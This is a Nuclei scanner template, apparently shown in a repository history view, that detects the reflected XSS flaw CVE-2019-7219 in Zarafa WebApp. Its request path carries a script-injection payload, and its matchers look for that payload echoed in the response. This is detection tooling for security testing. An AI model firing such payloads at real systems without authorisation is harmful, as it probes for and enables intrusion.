nuclei-templates/cves/2019/CVE-2019-7219.yaml

23 lines
417 B
YAML
Raw Normal View History

2021-01-09 14:45:11 +00:00
id: CVE-2019-7219
info:
name: Zarafa WebApp Reflected XSS
2021-01-10 14:15:36 +00:00
author: pd-team
2021-01-09 14:45:11 +00:00
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"><script>alert(1)</script>"
- type: word
part: header
words:
- "/html"